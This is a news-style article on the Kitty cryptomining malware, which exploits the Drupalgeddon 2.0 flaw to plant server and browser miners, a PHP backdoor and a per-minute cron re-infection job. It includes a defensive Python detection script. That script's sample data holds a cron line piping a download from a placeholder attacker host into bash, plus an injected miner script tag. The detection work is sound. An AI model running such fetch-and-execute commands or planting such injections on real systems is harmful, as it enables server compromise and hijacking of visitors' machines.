Kitty cryptomining malware.

     Kitty cryptomining malware takes advantage of the critical remote code execution vulnerability in Drupal to target both servers and browsers, according to researchers. The hackers install a mining program called kkworker on servers to mine the Monero cryptocurrency with xmrig. The attackers are also looking to expand their mining efforts to web app visitors using a mining script called me0w.js. They do this by adding the malicious JavaScript file me0w.js to the commonly used index.php file, cashing in on the processors of future visitors to the infected web server. The hackers behind Kitty have used the open source browser mining software webminerpool, and first write a bash script in the form of a PHP file called kdrupal.php to a server drive. The hackers reinforce their foothold in the infected server and guarantee dominance using a backdoor that is independent of the Drupal vulnerability.

     Researchers state that the PHP backdoor can use the SHA-512 hash function to protect the attackers' remote authentication. Once this backdoor is established, a time-based job scheduler entry is registered to periodically re-download and execute a bash script from remote hosts every minute. This means the attackers can easily reinfect the server and quickly push updates to the infected servers under their control. Researchers state that the Monero address used in Kitty had been spotted before, in April, in attacks targeting web servers running the vBulletin 4.2.X CMS. It seems that the hackers have updated the malware's version after every change in its code. The first generation of the Kitty malware discovered was version 1.5, and the latest version is 1.6. This indicates an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.
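A defender-side check for the two mechanisms described above, the per-minute cron job that pulls and runs a remote script and the me0w.js tag appended to index.php. This is an added example, not code from the article or from the researchers; the crontab and index.php samples are constructed, and attacker.example is a placeholder host.

```python
import re

# Indicators named in the article: the browser miner, the PHP dropper and the server miner.
KITTY_FILES = ("me0w.js", "kdrupal.php", "kkworker")

# A cron entry firing every minute whose command downloads something and pipes it into a
# shell matches the re-infection loop described above. This is a generic behavioural
# pattern, not a signature for the real malware.
CRON_EVERY_MINUTE = re.compile(r"^\s*\*\s+\*\s+\*\s+\*\s+\*\s+(?P<cmd>.+)$")
FETCH_INTO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")

# A <script> tag loading me0w.js appended to index.php is the browser-side injection.
MINER_SCRIPT_TAG = re.compile(r"<script[^>]+src=['\"][^'\"]*me0w\.js['\"]", re.IGNORECASE)


def suspicious_cron_entries(crontab_text):
    """Return crontab lines that run every minute and pipe a remote download into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        match = CRON_EVERY_MINUTE.match(line)
        if match and FETCH_INTO_SHELL.search(match.group("cmd")):
            hits.append(line.strip())
    return hits


def kitty_indicators_in_php(php_source):
    """Return findings for one PHP/HTML file: injected miner tags and known Kitty file names."""
    findings = [f"injected miner script: {tag}" for tag in MINER_SCRIPT_TAG.findall(php_source)]
    findings += [f"reference to {name}" for name in KITTY_FILES if name in php_source]
    return findings


# Constructed samples (not captured from a real host); attacker.example is a placeholder.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * curl -s http://attacker.example/update.sh | bash
*/5 * * * * /usr/local/bin/backup.sh
"""
SAMPLE_INDEX_PHP = """<?php
require_once 'core/includes/bootstrap.inc';
?>
<script src="http://attacker.example/me0w.js"></script>
"""

if __name__ == "__main__":
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", entry)
    for finding in kitty_indicators_in_php(SAMPLE_INDEX_PHP):
        print("index.php:", finding)
```

Run it against `crontab -l` output and the web root's index.php; a hit on the cron check means the re-download loop should be removed together with the backdoor, not just the miner binary.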

     Drupalgeddon 2.0, which has been patched for over a month now and impacts versions 6, 7, and 8 of Drupal's CMS platform, allows hackers to use multiple attack methods against a Drupal site, which could result in the site being completely compromised. Drupal warned that over one million sites running Drupal are impacted by the vulnerability, and several exploits have cropped up to take advantage of it. That includes a botnet, dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via infected systems. More recently, attackers behind a ransomware attack hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote code execution bug.